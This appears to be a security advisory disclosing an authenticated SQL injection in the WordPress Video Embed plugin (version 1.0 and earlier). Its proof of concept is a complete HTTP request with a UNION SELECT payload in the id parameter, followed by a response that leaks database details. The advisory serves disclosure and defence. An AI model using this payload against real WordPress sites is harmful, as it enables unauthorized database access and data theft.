Video Embed <= 1.0 - Authenticated (subscriber+) SQL Injection

The id GET parameter of one of the plugin’s page (available via forced browsing) is not sanitised, validated or escaped before being used in a SQL statement, allowing low privilege users, such as subscribers, to perform SQL injection.

PoC

Note: The URL /wp-admin/admin.php?page=edit-video-embed&id;=1 is not directly in the menu but can be accessed by forced browsing. GET http://172.28.128.50/wp-admin/admin.php?page=edit-video-embed&amp;id;=0+union+select+1%2Ccurrent_user()%2C3%2Cdatabase()%2C%40%40version%2C6%2C@@datadir%3B HTTP/1.1 Proxy-Connection: keep-alive Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-GPC: 1 Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [subscriber+] Host: 172.28.128.50 Response HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 17 Apr 2021 00:25:43 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: wp-settings-4=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: wp-settings-time-4=1618619143; expires=Sun, 17-Apr-2022 00:25:43 GMT; Max-Age=31536000; path=/ <… snip …> Title: |
—|—
Video from: | Youtube / Vimeo VideoSuit
Youtube Embed Url: | |

Please specify complete path(including ‘http’)

Pdf Path: | |

Please specify complete path(including ‘http’)

Audio Path: | |

Please specify complete path(including ‘http’)

Useful Link: | /var/lib/mysql/ |

Please specify your html content

|

<… snip …>